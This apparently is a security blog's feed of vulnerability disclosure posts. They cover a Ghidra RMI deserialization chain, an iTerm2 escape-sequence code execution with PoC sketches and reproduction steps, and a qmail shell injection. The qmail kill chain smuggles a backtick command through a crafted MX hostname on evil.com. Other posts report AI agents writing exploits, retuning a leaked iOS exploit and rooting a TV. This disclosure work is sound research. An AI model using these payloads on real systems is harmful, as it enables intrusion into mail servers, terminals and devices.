checkServerBindNames(reg);          // &#8594; reg.list() &#8594; readObject() with NO filter</code></pre></div><p>"Java RMI deserialization" usually means "go grab a chain from ysoserial." However, the only fat jar on the default Ghidra client classpath is <code>jython-standalone-2.7.4.jar</code>, and Jython 2.7.4 specifically patched the classic ysoserial <code>Jython1</code> chain by adding a <code>readResolve()</code> tripwire to <code>PyFunction</code>.</p><p>So we asked AI to go looking for another <code>Serializable</code> + <code>InvocationHandler</code> in the same jar, and found one the Jython devs missed: <code>org.python.core.PyMethod</code>.</p><p>The chain wires <code>PyMethod.__func__</code> to the package-private <code>BuiltinFunctions</code> table at <code>index=18</code> &#8212; which is <code>__builtin__.eval</code> &#8212; and feeds it a <code>PyBytecode</code> object. <code>PyBytecode</code> is Jython's <em>CPython 2.7 opcode interpreter</em>, and serialises cleanly. The payload is 21 bytes of CPython bytecode that pulls <code>java.lang.Runtime</code> out of <code>co_consts</code> and calls <code>exec</code>.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">PriorityQueue.readObject
  &#9492;&#9472; siftDownUsingComparator
    &#9492;&#9472; Proxy(Comparator).compare      &#8592; PyMethod is the InvocationHandler
      &#9492;&#9472; PyMethod.__call__
        &#9492;&#9472; BuiltinFunctions[18]       &#8592; __builtin__.eval
          &#9492;&#9472; eval(PyBytecode, g, l)
            &#9492;&#9472; CPython 2.7 interpreter
              &#9492;&#9472; Runtime.getRuntime().exec({"/bin/sh","-c",CMD})</code></pre></div><p>A Java deserialisation chain that bottoms out in a Python bytecode VM. We think that's a first.</p><p>The victim sees one error dialog <em>after</em> the calculator has already popped &#8212; <code>PySingleton cannot be cast to Integer</code>, which is just <code>PriorityQueue</code> being confused about what it got back. By then it doesn't matter.</p><div id="youtube2-KXFTbr43HQo" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;KXFTbr43HQo&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/KXFTbr43HQo?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p>Write-up and PoC (to be uploaded): <a href="https://github.com/califio/publications/tree/main/MADBugs/ghidra-rmi-rce">https://github.com/califio/publications/tree/main/MADBugs/ghidra-rmi-rce</a>.</p><p>This affects every Ghidra release &#8805; 9.1. The fix is the obvious one: install the same serial filter on the client that already ships for the server. We've sent a patch.</p><p>And yes, we're aware we just dropped a 0-day on an NSA product (again!). Relax, disclosure cops. taviso is in the house.</p><p>Also, if the NSA is half as good at this as everyone says, they already knew. We're just bringing the rest of you up to speed.</p><div><hr></div><p><em>The MAD Bugs series runs through April 2026. 
Full index at <a href="https://blog.calif.io/t/madbugs">blog.calif.io/t/madbugs</a> and <a href="https://github.com/califio/publications/tree/main/MADBugs">github.com/califio/publications</a>.</em></p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: "cat readme.txt" is not safe in iTerm2]]></title><description><![CDATA[Turning "cat readme.txt" into arbitrary code execution in iTerm2.]]></description><link>https://blog.calif.io/p/mad-bugs-even-cat-readmetxt-is-not</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-even-cat-readmetxt-is-not</guid><pubDate>Fri, 17 Apr 2026 18:24:59 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/1a02736f-409b-4fac-879f-7f0fcaaad68d_2318x1326.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In a previous post about <a href="https://blog.calif.io/p/mad-bugs-month-of-ai-discovered-bugs">AI-discovered bugs</a> in <a href="https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude">Vim and Emacs</a>, we looked at how seemingly harmless workflows could cross a surprising line into code execution. 
This time we wanted to push that idea even further: is <code>cat readme.txt</code> safe?</p><p>It turns out that it is NOT, if you use iTerm2.</p><div id="youtube2-J-CyOJcKXwg" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;J-CyOJcKXwg&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/J-CyOJcKXwg?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p>That looks insane until you understand what iTerm2 is trying to do for a legitimate feature, how it uses the PTY, and what happens when terminal output is able to impersonate one side of that feature's protocol.</p><blockquote><p>We'd like to acknowledge OpenAI for partnering with us on this project.</p></blockquote><h2>Background: iTerm2's SSH integration</h2><p>iTerm2 has an SSH integration feature that gives it a richer understanding of remote sessions. To make that work, it does not just "blindly type commands" into a remote shell. Instead, it bootstraps a tiny helper script on the remote side called the conductor.</p><p>The rough model is:</p><ol><li><p>iTerm2 launches SSH integration, usually through <code>it2ssh</code>.</p></li><li><p>iTerm2 sends a remote bootstrap script, the conductor, over the existing SSH session.</p></li><li><p>That remote script becomes the protocol peer for iTerm2.</p></li><li><p>iTerm2 and the remote conductor exchange terminal escape sequences to coordinate things like:</p><ul><li><p>discovering the login shell</p></li><li><p>checking for Python</p></li><li><p>changing directories</p></li><li><p>uploading files</p></li><li><p>running commands</p></li></ul></li></ol><p>The important point is that there is no separate network service. 
The conductor is just a script running inside the remote shell session, and the protocol is carried over normal terminal I/O.</p><h2>PTY refresher</h2><p>A terminal used to be a real hardware device: a keyboard and screen connected to a machine, with programs reading input from that device and writing output back to it.</p><p>A terminal emulator like iTerm2 is the modern software version of that hardware terminal. It draws the screen, accepts keyboard input, and interprets terminal control sequences.</p><p>But the shell and other command-line programs still expect to talk to something that looks like a real terminal device. That is why the OS provides a PTY, or pseudoterminal. A PTY is the software stand-in for the old hardware terminal, and it sits between the terminal emulator and the foreground process.</p><p>In a normal SSH session:</p><ul><li><p>iTerm2 writes bytes to the PTY</p></li><li><p>the foreground process is <code>ssh</code></p></li><li><p><code>ssh</code> forwards those bytes to the remote machine</p></li><li><p>the remote conductor reads them from its stdin</p></li></ul><p>So when iTerm2 wants to "send a command to the remote conductor," what it actually does locally is write bytes to the PTY.</p><h2>The conductor protocol</h2><p>The SSH integration protocol uses terminal escape sequences as its transport.</p><p>Two pieces matter here:</p><ul><li><p><code>DCS 2000p</code> is used to hook the SSH conductor</p></li><li><p><code>OSC 135</code> is used for pre-framer conductor messages</p></li></ul><p>At source level, <code>DCS 2000p</code> causes iTerm2 to instantiate a conductor parser. 
Then the parser accepts <code>OSC 135</code> messages like:</p><ul><li><p><code>begin &lt;id&gt;</code></p></li><li><p>command output lines</p></li><li><p><code>end &lt;id&gt; &lt;status&gt; r</code></p></li><li><p><code>unhook</code></p></li></ul><p>So a legitimate remote conductor can talk back to iTerm2 entirely through terminal output.</p><h2>The core bug</h2><p>The bug is a trust failure. iTerm2 accepts the SSH conductor protocol from terminal output that is not actually coming from a trusted, real conductor session. In other words, untrusted terminal output can impersonate the remote conductor.</p><p>That means a malicious file, server response, banner, or MOTD can print:</p><ul><li><p>a forged <code>DCS 2000p</code> hook</p></li><li><p>forged <code>OSC 135</code> replies</p></li></ul><p>and iTerm2 will start acting like it is in the middle of a real SSH integration exchange. That is the exploit primitive.</p><h2>What the exploit is really doing</h2><p>The exploit file contains a fake conductor transcript.</p><p>When the victim runs:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh">cat readme.txt</code></pre></div><p>iTerm2 renders the file, but the file is not just text. It contains:</p><ol><li><p>a fake <code>DCS 2000p</code> line that announces a conductor session</p></li><li><p>fake <code>OSC 135</code> messages that answer iTerm2's requests</p></li></ol><p>Once the hook is accepted, iTerm2 starts its normal conductor workflow. In upstream source, <code>Conductor.start()</code> immediately sends <code>getshell()</code>, and after that succeeds it sends <code>pythonversion()</code>.</p><p>So the exploit does not need to inject those requests. 
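</p><p>In skeleton form, such a fake transcript is just a concatenation of escape sequences. A rough sketch of the shape (the DCS/OSC framing is standard ECMA-48; the payload fields here are simplified placeholders, not the PoC's exact grammar):</p>

```python
ESC = "\x1b"
ST = ESC + "\\"        # ECMA-48 string terminator
BEL = "\x07"

def dcs(body):         # DCS <body> ST
    return f"{ESC}P{body}{ST}"

def osc135(msg):       # OSC 135 ; <msg> BEL
    return f"{ESC}]135;{msg}{BEL}"

# Forged hook, then canned replies for the requests iTerm2 sends on its own.
transcript = (
    dcs("2000p;...")           # announce a conductor session (fields elided)
    + osc135("begin 1")        # command body for getshell
    + osc135("/bin/bash")      # fake shell-discovery output
    + osc135("end 1 0 r")      # getshell "succeeds"
    + osc135("begin 2")        # command body for pythonversion
    + osc135("end 2 1 r")      # pythonversion "fails"
    + osc135("unhook")
)
print(transcript.count(BEL))   # 6 -- one per OSC 135 message
```

<p>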
iTerm2 issues them itself, and the malicious output only has to impersonate the replies.</p><h2>Walking the state machine</h2><p>The fake <code>OSC 135</code> messages are minimal but precise.</p><p>They do this:</p><ol><li><p>Start a command body for <code>getshell</code></p></li><li><p>Return lines that look like shell-discovery output</p></li><li><p>End that command successfully</p></li><li><p>Start a command body for <code>pythonversion</code></p></li><li><p>End that command with failure</p></li><li><p>Unhook</p></li></ol><p>This is enough to push iTerm2 down its normal fallback path. At that point, iTerm2 believes it has completed enough of the SSH integration workflow to move on to the next step: building and sending a <code>run(...)</code> command.</p><h2>Where <code>sshargs</code> comes in</h2><p>The forged <code>DCS 2000p</code> hook contains several fields, including attacker-controlled <code>sshargs</code>.</p><p>That value matters because iTerm2 later uses it as command material when it constructs the conductor's <code>run ...</code> request.</p><p>The exploit chooses <code>sshargs</code> so that when iTerm2 base64-encodes:</p><div class="callout-block" data-callout="true"><p>run &lt;padding&gt;&lt;magic-bytes&gt;</p></div><p>the last 128-byte chunk becomes:</p><div class="callout-block" data-callout="true"><p>ace/c+aliFIo</p></div><p>That string is not arbitrary. It is chosen because it is both:</p><ul><li><p>valid output from the conductor encoding path</p></li><li><p>a valid relative pathname</p></li></ul><h2>The PTY confusion that makes exploitation possible</h2><p>In a legitimate SSH integration session, iTerm2 writes base64-encoded conductor commands to the PTY, and <code>ssh</code> forwards them to the remote conductor. In the exploit case, iTerm2 still writes those commands to the PTY, but there is no real SSH conductor. 
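</p><p>The chunk arithmetic behind that final <code>ace/c+aliFIo</code> chunk can be checked in isolation. A minimal sketch (the <code>"A" * 92</code> filler stands in for the real <code>sshargs</code>-derived padding; only the lengths matter):</p>

```python
import base64

MAGIC_B64 = "ace/c+aliFIo"            # desired final chunk: a valid relative path
magic = base64.b64decode(MAGIC_B64)   # the 9 raw bytes that re-encode to it

# Pad "run ..." so the magic bytes land on a 3-byte boundary (base64 groups
# stay aligned) and the encoded length sits 12 chars past a 128-char chunk:
# 4 + 92 + 9 = 105 bytes -> 140 base64 chars = 128 + 12.
payload = b"run " + b"A" * 92 + magic
encoded = base64.b64encode(payload).decode()

chunks = [encoded[i:i + 128] for i in range(0, len(encoded), 128)]
print(chunks[-1])                     # ace/c+aliFIo
```

<p>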
The local shell receives them as plain input instead.</p><p>That is why the session looks like this when recorded:</p><ul><li><p><code>getshell</code> appears as base64</p></li><li><p><code>pythonversion</code> appears as base64</p></li><li><p>then a long base64-encoded <code>run ...</code> payload appears</p></li><li><p>the last chunk is <code>ace/c+aliFIo</code></p></li></ul><p>Earlier chunks fail as nonsense commands. The final chunk works if that path exists locally and is executable.</p><h2>Steps to reproduce</h2><p>You can reproduce the original file-based PoC with <code>genpoc.py</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh">python3 genpoc.py
unzip poc.zip
cat readme.txt</code></pre></div><p>This creates:</p><ul><li><p><code>ace/c+aliFIo</code>, an executable helper script</p></li><li><p><code>readme.txt</code>, a file containing the malicious <code>DCS 2000p</code> and <code>OSC 135</code> sequences</p></li></ul><p>The second fools iTerm2 into talking to a fake conductor. The first gives the shell something real to execute when the final chunk arrives.</p><p>For the exploit to work, run <code>cat readme.txt</code> from the directory containing <code>ace/c+aliFIo</code>, so the final attacker-shaped chunk resolves to a real executable path.</p><h2>Disclosure timeline</h2><ul><li><p>Mar 30: We reported the bug to iTerm2.</p></li><li><p>Mar 31: The bug was fixed in commit <code>a9e745993c2e2cbb30b884a16617cd5495899f86</code>.</p></li><li><p>At the time of writing, the fix has not yet reached stable releases.</p></li></ul><p>When the patch commit landed, we tried to rebuild the exploit from scratch using the patch alone. The prompts used for that process are in <a href="https://github.com/califio/publications/tree/main/MADBugs/iTerm2/prompts.md"><code>prompts.md</code></a>, and the resulting exploit is <code>genpoc2.py</code>, which works very similarly to <code>genpoc.py</code>.</p><div><hr></div><p><em>The MAD Bugs series runs through April 2026. Full index at <a href="https://blog.calif.io/t/madbugs">blog.calif.io/t/madbugs</a> and <a href="https://github.com/califio/publications/tree/main/MADBugs">github.com/califio/publications</a>.</em></p>]]></content:encoded></item><item><title><![CDATA[We Asked Claude to Audit Sagredo's qmail. 
It found a RCE.]]></title><description><![CDATA[One prompt, 101 minutes, and a working exploit against a widely deployed qmail fork.]]></description><link>https://blog.calif.io/p/we-asked-claude-to-audit-sagredos</link><guid isPermaLink="false">https://blog.calif.io/p/we-asked-claude-to-audit-sagredos</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Thu, 16 Apr 2026 20:04:22 GMT</pubDate><content:encoded><![CDATA[<blockquote><p><em>"Find vulnerabilities in latest version of qmail: https://github.com/sagredo-dev/qmail. Focus on vulnerabilities that could result in RCE or system compromise by processing a crafted email."</em></p></blockquote><p>That was the entire prompt. </p><p>One hour and forty-one minutes later, our in-house harness had spun up a test environment, audited the codebase, found a remote code execution vulnerability, written a working exploit, generated a patch, and produced a <a href="https://github.com/califio/publications/tree/main/MADBugs/qmail">full technical report</a>, all without a human touching a terminal.</p><h2>The Most Secure Software Ever Written</h2><p>If you've spent any time around mail servers, you know qmail. And if you know qmail, you know Daniel J. Bernstein.</p><p>Most people today know DJB as the cryptographer behind a whole ballroom of dancing ciphers and curves: Salsa20, ChaCha20, Tango20 (okay, not Tango), plus Curve25519 and Ed25519, which now sign roughly every SSH session and TLS handshake on the planet. But a decade before any of that, DJB was the guy who decided email security was a solved problem and then solved it.</p><p>He wrote qmail in 1995 as a direct rebuke to Sendmail, which at the time was less a mail transfer agent and more a recurring CVE subscription. qmail was deliberately small and paranoid, splitting mail handling across seven mutually-distrustful Unix users so that a bug in one component couldn't touch another. 
DJB was confident enough in the result to put up a $500 bounty, later raised to $1,000, for anyone who could find a security hole.</p><p>For nearly a decade, nobody could. Then in 2005, Georgi Guninski found an integer overflow in <code>stralloc_readyplus</code> that could be triggered on 64-bit systems with absurd amounts of RAM. DJB, being DJB, <a href="https://cr.yp.to/qmail/guarantee.html">refused to pay</a>, arguing that nobody actually runs qmail on a machine with gigabytes of memory and no resource limits. Qualys eventually <a href="https://www.qualys.com/2020/05/19/cve-2005-1513/remote-code-execution-qmail.txt">proved it exploitable in 2020</a>, and the "nobody" in question turned out to be "most of the Internet."</p><p>Disputed payouts aside, qmail became the canonical example of secure software design, the subject of papers and university courses, and "be like qmail" became shorthand for doing security properly. Then DJB stopped maintaining it: the last release, qmail 1.03, shipped in June 1998, and there has never been a 1.04.</p><h2>The Ship of Theseus Problem</h2><p>The Internet, inconveniently, did not stop in 1998. A mail server from the Clinton administration doesn't speak STARTTLS, doesn't know about SPF, DKIM, DMARC, SMTP AUTH, or IPv6, and has no idea what to do about the modern spam ecosystem, so the community did what communities do and started patching.</p><p>Over 25+ years, qmail accumulated an enormous orbit of third-party patches: netqmail, qmail-tls, vpopmail integration, CHKUSER, SURBL, and dozens more. Eventually people got tired of applying forty patches in the right order, and consolidated distributions emerged. 
One of the most popular today is <a href="https://github.com/sagredo-dev/qmail">Roberto Puzzanghera's (sagredo) qmail</a>, a batteries-included fork that bundles the patches a modern mail admin actually needs.</p><p>The problem is that DJB's security guarantee covered DJB's code, and the thousand-dollar bounty was for qmail 1.03. Every patch bolted on since then was written by someone else, reviewed by someone else (or no one), and merged into a codebase whose original safety arguments may no longer hold. The hull is original, but the rigging is not.</p><h2>What the Machine Found</h2><p>Our system zeroed in on a feature called <code>notlshosts_auto</code> that was added in October 2024. The idea behind it is reasonable: when qmail tries to deliver mail and the remote server's TLS is broken, you don't want to retry TLS forever, so this feature automatically remembers the bad host by creating a marker file named after it, and future deliveries skip TLS for that host. The implementation lives in <code>qmail-remote.c</code>, inside the TLS error handler <code>tls_quit()</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">sprintf(acfcommand, "/bin/touch %s/control/notlshosts/'%s'",
        info-&gt;pw_dir, partner_fqdn);
fp = popen(acfcommand, "r");</code></pre></div><p>It builds a shell command containing the remote hostname and runs it with <code>popen()</code>. The author wrapped the hostname in single quotes, presumably thinking that neutralizes shell metacharacters, but that protection fails the moment the hostname contains a single quote of its own.</p><p>The obvious objection is that hostnames can't contain single quotes, and that's true of <em>host names</em> in the RFC 952 sense, but it is not true of DNS labels. On the wire, a DNS label is just a length byte followed by up to 63 arbitrary bytes; RFC 1035 lets you put nearly anything in there, and most recursive resolvers will happily pass it through. When qmail calls glibc's <code>dn_expand()</code> to decode an MX record, some special characters get escaped, but <code>'</code>, <code>`</code>, <code>|</code>, <code>&amp;</code>, <code>&lt;</code>, and <code>&gt;</code> come through untouched. The net result is that <code>partner_fqdn</code>, the string being pasted into a shell command, is attacker-controlled via DNS.</p><h2>The Kill Chain</h2><ol><li><p>Attacker registers <code>evil.com</code>.</p></li><li><p>Attacker sets its MX record to point at a "hostname" like:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">x'`id&gt;/tmp/pwned`'y.evil.com</code></pre></div><p>That's 19 bytes in the first label, well within the 63-byte limit and perfectly legal on the wire.</p></li><li><p>Attacker points an A record for that name at a server they run, which speaks just enough SMTP to advertise <code>STARTTLS</code> and then deliberately botch the handshake.</p></li><li><p>Victim's qmail server tries to deliver <em>any</em> email to <code>evil.com</code>: a direct send, a forward, a mailing list bounce, an autoreply, whatever.</p></li><li><p>TLS fails, <code>tls_quit()</code> fires, 
and <code>popen()</code> runs:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">/bin/touch /var/qmail/control/notlshosts/'x'`id&gt;/tmp/pwned`'y.evil.com'</code></pre></div></li><li><p>The shell sees the single quotes close and reopen around a backtick substitution, and dutifully executes <code>id&gt;/tmp/pwned</code> as the <code>qmailr</code> user.</p></li></ol><p>We've published the full chain (Dockerized repro environment, DNS hook, fake SMTP server, exploit script, patch, and the AI-generated technical report) at <a href="https://github.com/califio/publications/tree/main/MADBugs/qmail">github.com/califio/publications/tree/main/MADBugs/qmail</a>.</p><p>We reported the issue to Roberto Puzzanghera, who fixed it promptly in commit <a href="https://github.com/sagredo-dev/qmail/commit/749f607f6885e3d01b36f2647d7a1db88f1ef741"><code>749f607</code></a> and shipped the fix in <a href="https://github.com/sagredo-dev/qmail/releases/tag/v2026.04.07">v2026.04.07</a>. If you run sagredo's qmail with <code>notlshosts_auto</code> enabled, you should upgrade.</p><h2>The Takeaway</h2><p>To be clear, this is not a DJB bug. You won't find <code>popen()</code> anywhere in qmail 1.03; it lives entirely in a community patch. And as shell injections go, it's not a particularly subtle one. A careful human reviewer would have caught it too.</p><p>What's notable is the cost. The input was one sentence and a URL, and the output was a verified exploit, a patch, and a report, with the reasoning in between (that DNS labels carry arbitrary bytes, that <code>dn_expand()</code> doesn't escape backticks, that the data flows into <code>popen()</code>) worked out unattended. That kind of end-to-end audit used to be expensive enough that most patch collections like this one simply never got reviewed. 
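</p><p>The break-out itself is compact enough to replay without qmail. A sketch of the string construction only (<code>/var/qmail</code> standing in for <code>pw_dir</code>, as in the kill chain; nothing is executed):</p>

```python
import shlex

# The same format string as the vulnerable sprintf(), filled the way
# qmail-remote would fill it for the malicious MX hostname.
template = "/bin/touch %s/control/notlshosts/'%s'"
fqdn = "x'`id>/tmp/pwned`'y.evil.com"
cmd = template % ("/var/qmail", fqdn)
print(cmd)
# /bin/touch /var/qmail/control/notlshosts/'x'`id>/tmp/pwned`'y.evil.com'

# Tokenised the way /bin/sh would see it: the attacker's first quote closes
# the author's, leaving `id>/tmp/pwned` outside any quoting.
print(shlex.split(cmd)[1])
# /var/qmail/control/notlshosts/x`id>/tmp/pwned`y.evil.com
```

<p>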
It isn't expensive anymore, for defenders or for attackers.</p><p>The practical conclusion is that this capability is worth pointing at your own code: the stuff you ship, and the dependencies you pull in. If 101 minutes of machine time can find bugs like this, you'd rather they be your 101 minutes than someone else's.</p><p>The software that survives the next decade will be the software that was audited by the same thing that's attacking it.</p><p><em>Write-up, PoC, and patch: <a href="https://github.com/califio/publications/tree/main/MADBugs/qmail">github.com/califio/publications/tree/main/MADBugs/qmail</a>. The vulnerability has been assigned <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-41113">CVE-2026-41113</a>.</em></p><div><hr></div><p><em>The MAD Bugs series runs through April 2026. Full index at <a href="https://blog.calif.io/t/madbugs">blog.calif.io/t/madbugs</a> and <a href="https://github.com/califio/publications/tree/main/MADBugs">github.com/califio/publications</a>.</em></p>]]></content:encoded></item><item><title><![CDATA[Learning to Jailbreak an iPhone with Claude (Part 1)]]></title><description><![CDATA[Claude helped me take apart an iOS Safari exploit, and retune it for my Mac. It even wrote its own variant.]]></description><link>https://blog.calif.io/p/learning-to-jailbreak-an-iphone-with</link><guid isPermaLink="false">https://blog.calif.io/p/learning-to-jailbreak-an-iphone-with</guid><pubDate>Wed, 15 Apr 2026 07:58:17 GMT</pubDate><content:encoded><![CDATA[<p>Claude is making waves in the vulnerability research community. Skills that took years to hone are becoming a commodity overnight, and that&#8217;s worrying.</p><p>In this series I want to explore the upside of the same shift: how we can learn alongside it. 
So I picked the thing that I&#8217;d always been curious about: take apart a real iPhone jailbreak, end to end, and actually understand it.</p><p>The vehicle is <strong>Coruna</strong>, a commercial spyware kit that leaked in full recently: a complete Safari-to-kernel chain for iOS 17, <a href="https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit">caught in the wild by Google</a>, now patched and public. Professional-grade exploitation code, written by people who do this for a living.</p><p><strong>Part 1</strong> is the first stage: CVE-2024-23222, a race condition deep inside Safari&#8217;s JavaScript engine, and the twelve-step climb from &#8220;one missing type check&#8221; to &#8220;read and write any byte in the process.&#8221;</p><p>Coruna&#8217;s exploit for it is calibrated for iPhone hardware and misses almost every time on a Mac, so the concrete deliverable for this part was Claude retuning it (timing constants, loop counts, heap-groom sizes) until it landed reliably on M-series silicon, with every change explained.</p><p>In a separate experiment Claude also produced its <em>own</em> working exploit for CVE-2024-23222, without Coruna as a reference. <strong>It didn&#8217;t just rediscover Coruna&#8217;s attack; it found its own way in</strong>. We&#8217;ll come back to this in a separate post.</p><h2>What it was like</h2><p>Working with Claude on this felt like having a Nobel laureate who&#8217;s happy to spend the afternoon on undergrad problem sets. No implied &#8220;this is beneath me,&#8221; no rationing of attention to questions that are interesting <em>enough</em>.</p><p>When an explanation wasn&#8217;t landing it would just <em>go build the thing</em>: spin up the debugger, write the measurement script, hand me the curve. 
The vulnerable WebKit wouldn&#8217;t even compile on my laptop at first, and it took Claude most of a night to figure out why.</p><p>Preparing Part 1 took me somewhere between 40 and 80 hours, most of it spent asking Claude the kind of questions you&#8217;d be embarrassed to ask a person twice. The trick to learning this way is to let the AI assist, not lead. If it just hands you the answer there&#8217;s nothing left to discover, and the current state is almost accidentally ideal for that: it gets things wrong just often enough that you have to push back, verify, and actually understand. The friction is the lesson.</p><p>If that holds, this is a glimpse of the future of education: anyone with a laptop and (of course) the tokens to pay for it gets the depth of attention a PhD advisor gives their best student.</p><blockquote><p>A caveat: although I tried hard to verify and challenge everything Claude gave me, it can still hand me a confident, wrong explanation and I&#8217;ll nod along because I don&#8217;t have the background to catch it. Parts of the write-ups are almost certainly off in ways neither of us noticed. If you spot something, I&#8217;d like to hear it.</p></blockquote><h2>Read it</h2><p><strong><a href="https://github.com/califio/publications/blob/main/MADBugs/coruna/Stage1-writeup.md">Part 1 is here</a></strong> (~14,000 words). It&#8217;s self-contained: no prior JIT-exploitation background assumed, and every claim that can be checked at a debugger prompt was checked at one. The <a href="https://github.com/califio/publications/tree/main/MADBugs/coruna/poc">PoC repo</a> has build steps if you want to see read64/write64 land on your own machine.</p><p>Part 2 picks up where this leaves off: arbitrary read/write inside Safari, but no code execution yet, because every return address on modern iPhones is cryptographically signed and you can&#8217;t forge the signatures. 
Coruna&#8217;s answer to that is next.</p><h2>Acknowledgments</h2><p>This builds on prior reverse-engineering work by Huy Nguyen, wh1te4ever, Duy Tran, Nathan, hrtowii, Nick Chan, and others in the jailbreak community who took Coruna apart first. Filip Pizlo&#8217;s &#8220;<a href="https://webkit.org/blog/10308/speculation-in-javascriptcore/">Speculation in JavaScriptCore</a>&#8220; and Samuel Gro&#223;&#8217;s <a href="https://phrack.org/issues/70/3.html">Phrack</a> and <a href="https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html">Project Zero</a> posts are the foundation everything here stands on.</p><p>&#8212;thai</p>]]></content:encoded></item><item><title><![CDATA[Codex Hacked a Samsung TV]]></title><description><![CDATA[We gave Codex a foothold. It popped a root shell.]]></description><link>https://blog.calif.io/p/codex-hacked-a-samsung-tv</link><guid isPermaLink="false">https://blog.calif.io/p/codex-hacked-a-samsung-tv</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Mon, 13 Apr 2026 19:05:49 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!3p6C!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This post documents our research into using AI to hack hardware devices. We'd like to acknowledge OpenAI for partnering with us on this project.</p><blockquote><p>No TVs were seriously harmed during this research. 
One may have experienced mild distress from being repeatedly rebooted remotely by an AI.</p></blockquote><p>We started with a shell inside the browser application on a Samsung TV, and a fairly simple question: if we gave Codex a reliable way to work against the live device and the matching firmware source, could it take that foothold all the way to root?</p><p>Codex had to enumerate the target, narrow the reachable attack surface, audit the matching vendor driver source, validate a physical-memory primitive on the live device, adapt its tooling to Samsung's execution restrictions, and iterate until the browser process became root on a real compromised device.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3p6C!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3p6C!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 424w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 848w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 1272w, 
